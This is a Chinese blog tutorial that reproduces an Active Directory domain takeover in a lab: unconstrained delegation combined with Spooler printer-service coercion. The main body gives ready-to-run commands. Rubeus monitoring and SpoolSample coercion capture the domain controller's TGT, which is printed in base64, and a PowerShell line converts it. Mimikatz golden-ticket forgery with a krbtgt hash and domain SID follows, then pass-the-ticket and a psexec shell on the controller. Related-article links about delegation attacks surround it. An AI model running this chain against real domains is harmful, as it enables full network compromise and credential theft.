非约束委派+Spooler打印机服务 制作黄金票据

最新推荐文章于 2023-02-14 11:19:37 发布
最新推荐文章于 2023-02-14 11:19:37 发布
阅读量2.3k 收藏 2
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/106511098
版权

环境

域: test.com
域控:Windows server 2012R2, 主机名: AD, IP: 192.168.1.7
域内主机:系统:windows 2008R2,主机名:WIN2008,ip:192.168.1.8


原理:利用非约束委派+Spooler打印机服务可以强制指定的主机进行连接

我们给win2008R2这个主机账户开启非约束委派
在这里插入图片描述



复现

1、首先我们需要一个win2008R2的管理账号

在这里插入图片描述
我直接用本地的管理员账号打开一个cmd
直接运行命令

Rubeus.exe monitor /interval:1 /filteruser:AD$
# 我们可以用Rubeus来监听Event ID为4624事件,这样可以第一时间截取到域控的TGT
# /interval:1 设置监听间隔1秒
# /filteruser 监听对象为我们的域控,注意后面有个$,如果不设置监听对象就监听所有的TGT

在这里插入图片描述


2、随便打开一个cmd(不需要管理员权限)

直接执行

SpoolSample_v4.5_x64.exe AD WIN2008
# 表示利用打印服务强制让域控机向WIN2008主机验证身份,这样我们的Rubeus就可以监听到TGS了

在这里插入图片描述
虽然报错了,但是Rubeus已经接收到了TGT
在这里插入图片描述这儿顺便提一句,有时候cmd不能最大化
我们可以现在cmd运行wmic,然后再扩大cmd,再exit退出即可



3、提取TGS

我们先复制Rubeus监听到的TGTbase64

doIEyDCCBMSgAwIBBaEDAgEWooID3jCCA9phggPWMIID0qADAgEFoQobCFRFU1QuQ09Noh0wG6ADAgECoRQwEhsGa3JidGd0GwhURVNULkNPTaOCA54wggOaoAMCARKhAwIBAqKCA4wEggOIizg+lVbsDAa52/eGBUXWJpRO41sYu+nax+InJiZwGIXDnAEu3GLvpPBTnlyUy5OFkwF0fxDtIJmz6d1ta5rcPla5UnFQtxqsLt2FAB8bI3oygtArPsLtVo2nk5cxzIWrpZiYbVv1af9GUvFTBUSYP8y/RgdhPXckAwbe8fJqBL+LwGnLzmA8E5x5AdBWQ58aYrr9UQgEoUxkSewA6Y76TmrBedZ5iTSUEKgeSfDH/kfrN9cxZEWKQVkZ9or69a/XYTUrekSXIZhFXqX1CjQmhUbXeUUptFzEnnpyYLFc0XLssxPMaKbsGvacTt1SZy7sLq5me6mB6JEP5nB68Is7o9luHTu0E3XAA2OGc3oZ3/lou32ddj3SFBYJkfgDjgM7du2/Ys3WyNKPPBRGBJExouhtVF2eM+E2ADbGBhMrN9QImq9cXHqKLW0qW0uQUcNlzzN10NEZq692ZFTomuPxWVLKeg+OuvJNsLS+D0kWYoCcTT7T48ZfEkZ6s9uBtb86ddEHzIasbLMuCGlYK/ISbF2C3Hxw5oEt6Bdj9rVdPTEr3XjMcmCemdiIGbd5jBqUabkd7UXkIq2J4mVuuApt0yy62Lb9dRv6YyyO2l8qr3Pr440zCAZMYXdmwWWuQiU2w1u0YMS14v4kjQcAnRUVSnEt7yw8LALcsFW8cOXbPuXF8KhzMZ1HA54crgieI8+n4aqZy6uMCtgQJHg8oH8K1QJdlxeWLpmROH3bUWGpbLIPWaV7d+6LLxePYioRhkTmWmigbqyTuIY5EbZWfqMH6/rjPacbdsnvYB82cr9RJ0zd6Hqu0z1266ZX0b1EIBTGADOS3zAC23nuduDwnW+3nWa5nJHG/wBKuXfhmidXp4Ccs7eQsWNYdZuDMknAsSzHG7b8Tq+CP+hA8b7/sUk2Rfl8dPqxlqDAPOauvqGzcpJUlHl69xS+IWpVnzag1Th10tLj+FkUJBmEHSV9eELKf38mlD8phQm+wZ4D0LCNVZpHUBSWPWw/vX0V4RVdIFTeRAlioj52IYFXMY+L427EN/fjefXLIJIXwgz+n4DumNYXlMzMOpMbURF/ZktM4+za5EQAmyaBBXvCavhkxg4UYWFpsAX5vgqOGvhbFWXxeBMh5HznA8+ORI0MNY1alJmfqUxuibD/POlHySGgxL1AehNoL7+bsxJW/5zq0iNEyaeJMHFeMnOj66OB1TCB0qADAgEAooHKBIHHfYHEMIHBoIG+MIG7MIG4oCswKaADAgESoSIEIC9SDAhlYy3MFcTbkg/BdIKYbsoGO6JvgRk5ZDUFgHqcoQobCFRFU1QuQ09NohAwDqADAgEBoQcwBRsDQUQkowcDBQBgoQAApREYDzIwMjAwNjAyMTQwMzAyWqYRGA8yMDIwMDYwMzAwMDMwMlqnERgPMjAyMDA2MDkwNDMyMjJaqAobCFRFU1QuQ09NqR0wG6ADAgECoRQwEhsGa3JidGd0GwhURVNULkNPTQ==

然后直接用powershell转到为正常的TGT即可

[IO.File]::WriteAllBytes("绝对路径\TGS\ticket.kirbi", [Convert]::FromBase64String("得到的base64"))

在这里插入图片描述

有一个比较坑的,那就是第一个参数用绝对路径,相对路径不是pwd命令的路径~~

这样我们就可以得到TGT票据了



4、制作黄金票据

注入TGT票据前
在这里插入图片描述
不能提取所有用户的hash

注入TGS票据后
在这里插入图片描述然后就是制作黄金票据了
具体过程请参考另一篇文章

这儿请注意,我们这儿获得的TGT票据,不能算黄金票据,因为我们获得的权限只是域控的本地管理权限,所以不能连接域控,但是我们确可以因此获取所以用户的hash,所以能制作真正的黄金票据~~

首先获得域的SID

whoami /user
# S-1-5-21-3298638106-3321833000-1571791979
# 得到上面的SID,注意不需要后面表示账号权限的几位数

然后就是制作票据

kerberos::golden /domain:test.com /sid:S-1-5-21-3298638106-3321833000-1571791979 /krbtgt:0199f7c89b9d5262c897e0d1bf858bfb /user:administrator /ticket:ntlm.kirbi

在这里插入图片描述然后注入票据
首先清除以前的票据

在cmd中运行 klist purge
在mimikatz运行:
kerberos::purge
kerberos::ptt ntlm.kirbi

然后klist查看我们注入的票据
在这里插入图片描述
可以直接连接域控

在这里插入图片描述
我们还可以直接用psexec反弹shell,因为注入了黄金票据,所以不需要用户名和秘密

在这里插入图片描述

这就是所有步骤了,如果有什么不明白的欢迎留言~~

最后还有如何用ADfind查找非约束委派的计算机和用户还没写,以后有机会再写一下吧~~

参考资料

域渗透——Kerberos委派攻击

HyyMbb
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
打印服务print spooler自动启动程序
03-18
开机自运行,解决打印服务异常关闭导致无法打印问题,软件开机自运行,打印服务停止后自动启动。
Kerberos-约束委派攻击
m0_75218183的博客
06-07 340
概念: 服务账号可以获取被委派用户的TGT,并将TGT缓存到lsass进程中,从而服务账号可使用该TGT,模拟该用户访问域内其他服务约束委派的设置需要SeEnableDelegationPrivilege权限,该特权通常只有域管理员才有。
Windows 内网渗透之委派攻击
qq_53742230的博客
07-31 1247
委派攻击的三种攻击手法
域内委派详解
mingyqf的博客
02-22 2089
委派概述: 域委派是指将域内用户的权限委派服务账号,使得服务账号能以用户的权限在域内展开活动。简言之:当A访问服务B时,服务B拿着A用户的凭证去访问服务C,这个过程称为委派委派的方式: 约束委派约束委派,基于资源的约束委派。 **在域内只有主机账号和服务账号才有委派属性****主机账号:**活动目录中的computers组内的计算机,也被称为机器账号。**服务账号:**域内用户的一种类型,是服务器运行服务时所用的账号,将服务运行起来加入域内,比如:SQLServer,MYSQL等;域用户通过注册S
windows中关于委派(delegation)的理解
热门推荐
Shanfenglan's blog
09-24 17万+
CATALOG前言委派一些问题S4U2SELF延伸S4U2PROXY约束委派约束委派基于资源的约束委派基于委派的攻击约束委派攻击约束委派攻击基于资源的约束委派攻击 前言 委派一般出现在域环境中。它是一种机制,在kerberos认证的时候会涉及到。不正确的委派的配置,可能使攻击者达到提权的目的。 委派 假设域内用户A需要访问服务器B,并需要以A的身份对服务器的端数据库进行更改。则A就会进行一个kerberos认证,来获取访问B的ticket。这时候就需要用到委派,也就是说,A依旧访问B且只申请一个访
域渗透约束委派&Spooler
Longwaer
01-23 1071
学习掌握内网域渗透委派攻击中约束委派,加上联合Spooler打印机的漏洞更好的了解漏洞原理。
【域权限维持】-约束委派&约束委派
qq_41617902的博客
02-14 440
域的约束委派&约束委派利用
约束委派攻击
qq_45462249的博客
07-24 604
约束委派攻击
域渗透之约束委派
qq_56426046的博客
11-12 705
一个域内普通用户jack通过Kerberos协议认证到前台WEB服务后,前台运行 WEB服务服务账号websvc模拟(Impersonate)用户 jack,以Kerberos 协议继续认证到后台服务器,从而在后台服务器中获取jack用户的访问权限,即域中单跳或者多跳的Kerberos认证。KDC检查websvc的委派属性,如果被设置,且申请的文件服务在允许的列表清单中,则返回一个jack用户访问文件服务的授权票据 ST;websvc收到的jack用户的授权票据ST后,可访问文件服务,完成多跳认证。
约束委派攻击原理与利用
yy
04-07 5070
在实际情况中,往往多个服务不可能都在一台机器中,那么如果用户在使用服务A时,又需要用到服务B上的数据,那么最简单的方式就是A代替用户去请求B并返回相应的数据,这个过程就是委派。即 委派=我帮你去做什么事委派攻击分为约束委派约束委派、基于资源的约束委派三种。
SpoolSample-master_Spooler_TheOther_
09-28
SpoolSamplePoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface. This is possible via other protocols as well.
C#的Spooler打印机相关API和Demo
08-20
这是使用C#编写的打印机相关API,使用C#的底层API控制打印机的打印,暂停,继续,删除,添加打印任务等操作
打印机服务重启工具 Print Spooler服务重启工具
08-28
一个图形化的打印服务重启工具,没什么特别的 给经常由于打印服务崩坏而导致打印功能凉了的同学使用
PrintSpooler.zip_Print Spooler API_printspooler 代码_打印机_打印机监控
07-14
使用VS2012 C#语言,windows应用程序类别,利用win32 API对打印机进行监控,并实时输出打印信息到窗口
打印机不能启动Print_Spooler服务的解决方法
01-04
打印机不能启动Print_Spooler服务的解决方法
mimikatz的基本使用
a3320315的博客
05-25 9622
常见命令 cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称--
域渗透——基于资源的约束委派利用
a3320315的博客
07-03 1788
环境 域: test.com 域控:Windows server 2012R2, 主机名: AD, IP: 192.168.1.7 委派的域内主机:系统:win2008R2,主机名:win2008,ip:192.168.1.24 域内普通用户: test,对win2008有写的权限 域内普通用户: test1 攻击机器:系统:win2019 ip:192.168.1.19 登录用户为test1 设置test的写权限 验证test这个用户对win2008是否具有写权限,可以使用PowerView枚举w
约束委派+利用约束委派生成黄金票据
a3320315的博客
06-21 1601
环境 域: test.com 域控:Windows server 2012R2, 主机名: AD, IP: 192.168.1.7 域内主机:系统:windows 2012R2,主机名:HyyMbb,ip:192.168.1.22 被委派用户test 测试用户test1 操作步骤 我们需要提前知道的信息 被委派用户的明文密码或者ntml 密码:123!@#qwe ntml:e5ae562ddfaa6b446c32764ab1ebf3ed 1、已经知道服务用户明文的条件下,我们可以用kekeo请求该用户
打印机服务print spooler自动停止
最新发布
12-12
打印机服务(print spooler)是计算机操作系统中的一个重要组件,它负责接收和管理打印任务。然而,有时候我们可能会遇到打印机服务自动停止的问题。 当打印机服务自动停止时,我们可以尝试以下步骤来解决这个问题。首先,我们可以尝试重新启动打印机服务。步骤如下:点击开始菜单,进入控制面板,找到“管理工具”,然后在其中找到“服务”。在服务列表中,找到“打印机接口”的服务,并右击选择“重新启动”。 如果重新启动打印机服务失败,我们可以尝试清空打印队列来解决问题。我们可以进入控制面板,在其中找到“设备和打印机”,找到当前正在使用的打印机并右击选择“查看打印队列”。在打印队列中,我们可以选择“文档”菜单,并选择“取消所有文档”。 如果上述步骤仍然无法解决问题,我们可以尝试删除并重新安装打印机驱动程序。我们可以进入设备和打印机菜单,找到需要重新安装的打印机,并右击选择“删除设备”。然后,我们可以在打印机的官方网站上下载正确版本的驱动程序,并按照提示进行安装。 此外,我们还可以检查打印机连接是否正常。我们可以确保打印机与计算机之间的连接线正常连接,并且确保打印机的电源已经打开。 如果上述方法都无法解决问题,我们可以尝试联系打印机制造商的技术支持团队,他们可能能够提供更详细的解决方案或进行远程协助。 总的来说,当打印机服务(print spooler)自动停止时,我们可以尝试重新启动服务、清空打印队列、删除并重新安装驱动程序等方法来解决问题。如果问题仍然存在,我们可以联系技术支持寻求进一步的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值